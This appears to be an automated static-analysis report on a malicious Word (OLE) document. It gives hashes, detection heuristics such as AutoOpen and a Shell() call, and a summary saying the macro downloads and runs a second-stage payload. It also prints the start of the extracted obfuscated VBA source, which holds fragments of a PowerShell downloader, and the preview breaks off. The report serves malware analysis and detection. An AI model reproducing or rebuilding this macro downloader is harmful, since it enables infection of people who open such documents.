Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 760f6ed412004b39…

MALICIOUS

Office (OLE)

274.5 KB Created: 2017-12-01 12:46:00 Authoring application: Microsoft Office Word First seen: 2017-12-08
MD5: d0aeea69654c21bc994d53d4698502b0 SHA-1: 7ae288a8eed0da848f025891df42fa880d81af7d SHA-256: 760f6ed412004b393a1ea73a488c8e4646563061639dba156e6213f0643ba525
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics indicate that the macros use the Shell() function to execute arbitrary code. The ClamAV detection 'Doc.Macro.Obfuscation-6389653-0' further confirms its malicious nature. The primary function of the VBA script appears to be downloading and executing a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Macro.Obfuscation-6389653-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6389653-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 136863 bytes
SHA-256: b7dafe0cf3a6146921cc82e946398dd784ba799846375b559c4ebd1f4dcfdfb7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "zKETIifthc"
Function BajsCjKRDYzJH()
OrDbQpvJDf = Array(LTrim(LTrim("TAvQIrfZmZsmh" + "WrEHTUtr")), LTrim(LTrim("bajjnhwYjtV" + "JNbiNblvA")), LTrim(LTrim("WRNzdqjPf" + "cWUpbIsrnBMsMq")), LTrim(LTrim("ddZGsIwd" + "EPWpEIsR")), LTrim(LTrim("bqntlGEjt" + "zFdFWkzM")), LTrim(LTrim("JmlfsLlM" + "CniJuilAZksS")), LTrim(LTrim("JOoiDaJ" + "FEwlHcpKvizuSh")), LTrim(LTrim("dqLzUWL" + "UnIdXrNIK")))
TUFjHs = Mid("lmpWcjBlIc[5]+Ss4xSs4)').rEPLaCe(([cHar]71+[cHar]50+[cHar]83),'|').rEPLaCe(([cJuPcN78w5wZI", 7, 72)
csTwbvDz = Array(LTrim(LTrim("zculLmD" + "hzqUVodTFTA")), LTrim(LTrim("XSJGNARHj" + "PJTfNhdQp")), LTrim(LTrim("qiiuApftzK" + "QkwjhTnYKVw")), LTrim(LTrim("QjhApbwpodcWpn" + "FYVXJWkwY")), LTrim(LTrim("zfOpsfDulN" + "TopSBUrm")), LTrim(LTrim("bqtEhAoz" + "bjlIfqvhzwwZb")), LTrim(LTrim("ZDmjjFH" + "tMPtImK")), LTrim(LTrim("rqFHKhZL" + "zWUUunjz")))
wNWlPQIa = Array(LTrim(LTrim("mzihXmB" + "pdCsYibIKosbpd")), LTrim(LTrim("pczzzSSiaprfkX" + "SYzYjhNcPZBOhZ")), LTrim(LTrim("jNJDtFanC" + "WvbChCrlOVT")), LTrim(LTrim("QzMcAiazDlI" + "GiWhipsk")), LTrim(LTrim("vJmlZiWKdTDwFw" + "rQFrNEZl")), LTrim(LTrim("RwDfKHYcjiVn" + "raADnZSENA")), LTrim(LTrim("KpNkAXqVYzTc" + "rAWubNWaYRZ")), LTrim(LTrim("rKRzTiDvVUU" + "obLsAPaXwVLnDX")))
PcOzfVOBAI = Array(LTrim(LTrim("wsmmVbQFo" + "wNFjjZwsAmAU")), LTrim(LTrim("YOjAimmOudR" + "jQKNmat")), LTrim(LTrim("NdaldVuSNGnNcP" + "YlbiTBXCk")), LTrim(LTrim("jzJniNLHaOvnz" + "MrUBnqEXTC")), LTrim(LTrim("cLsasqaqwzYl" + "isbFCBSkoDV")), LTrim(LTrim("hVPuiIiGACC" + "hhYUzzanG")), LTrim(LTrim("TuOwVRjBoHWzK" + "LwPpuiifqI")), LTrim(LTrim("UdwnodiUtC" + "fkmMXzOuwh")))
WNlqAfna = Mid("348U6+[CHAR]115),[CHAR]39) G'+'2S&( zqAEnV:PUBLiC[13]+zqAEnV:PUlrBqV27Hb6Pv4ld", 5, 59)
slTkb = Array(LTrim(LTrim("AiHmYnFJNYV" + "RQjJWfc")), LTrim(LTrim("zBiaJqC" + "WwdwwECROiv")), LTrim(LTrim("iSwTfLJ" + "RMpHbRiz")), LTrim(LTrim("jchlZmPvZHMNOu" + "kWXjDKuwhuOKI")), LTrim(LTrim("UfaDShFOUJ" + "iYGDwuCRCXE")), LTrim(LTrim("zvplizrKcGZEcm" + "wNhVCNAU")), LTrim(LTrim("ovlALtGwQlcH" + "vbOczDczCaJ")), LTrim(LTrim("GEUBCjwbDziO" + "wjzaorJCTRFHZ")))
nZBqz = Array(LTrim(LTrim("DIBkktcKoD" + "aBokOzi")), LTrim(LTrim("iRSqQfCiGfQvM" + "zZqmEspsjORaJ")), LTrim(LTrim("XnlPQHDFlSkF" + "KViXHsjDPubv")), LTrim(LTrim("wmiDZqVRKTuB" + "FnsnXCzKiWE")), LTrim(LTrim("JhajIsJUfIQWh" + "tjQABkWcnwLbW")), LTrim(LTrim("waUPdNQJuk" + "bkhAwWV")), LTrim(LTrim("fIPudUU" + "jtiVhWjYEo")), LTrim(LTrim("sUckofz" + "zpcrZqVrRjj")))
CUuRjdw = Array(LTrim(LTrim("ridbajRlsfN" + "OJGoMmdjF")), LTrim(LTrim("wuWuOir" + "jNfPLNtBwthwEA")), LTrim(LTrim("qaZdTbfW" + "WmkjEfVmu")), LTrim(LTrim("zzhwwtvKnjBJzw" + "jUpAXTBrNtYd")), LTrim(LTrim("zSXuCGAN" + "cakYQrmQ")), LTrim(LTrim("nlBXLjmW" + "zHUEaPlNUMH")), LTrim(LTrim("szUYsOPz" + "KEzjksI")), LTrim(LTrim("HqIfbDFoXA" + "mDWaIGunjz")))
DRSdPuFY = Mid("5N735VzXjO6RQ8E1hbk5msYun6Sw1saVpbc.ToStriNVs+NVsng(NVs+NVs),'+' NVs+NVsRSV'+'huas);NVs+N'+'VsInvoke-Item(RNVs+NVsSVhuNVs+NVsas);break;}catSs4+Ss4ch{NVs+NVswriteNVs+NVs-host R'+'SVNVs+NVs_.Ex'+'ceptiNVs+NVson.MesNVs+NVsSs4+Ss4dHb", 34, 193)
QrGczsdQEFj = Array(LTrim(LTrim("uJtjPQPUEAJwH" + "clCXaOiuUi")), LTrim(LTrim("CFiLiSr" + "zGiatVYPiV")), LTrim(LTrim("jjjDNjouGSLApP" + "NLkIaiRYKPt")), LTrim(LTrim("JCBwAYWw" + "SBRbqYlEmF")), LTrim(LTrim("LNHNiWvQOHZoTZ" + "rETLbTQHvJT")), LTrim(LTrim("jJjTXJAwvuo" + "ddFjPsNzCK")), LTrim(LTrim("hlaiauGMDLqL" + "ioBiTak")), LTrim(LTrim("PzhwNhrCwWdZdz" + "zfZDpikInRzB")))
pCRtIbluW = Array(LTrim(LTrim("SWXcnDWXp" + "dnNVwaRuPk")), LTrim(LTrim("OuMwnioaqE" + "ZoYmIwQCRzL")), LTrim(LTrim("JPIEJfdtRPwEbK" + "zYhzwSBOZwM")), LTrim(LTrim("SiNSUCvDi" + "aiuMKJKpUKz")), LTrim(LTrim("QdjCMfIBjI" + "MLPEwiBjHvUwDC")), LTrim(LTrim("HrDkbCVzNjiS" + "PuhvShiBvFNLT")), LTrim(LTrim("pZwfjAaYQwz" + "urNCVOLLQMN")), LT
... (truncated)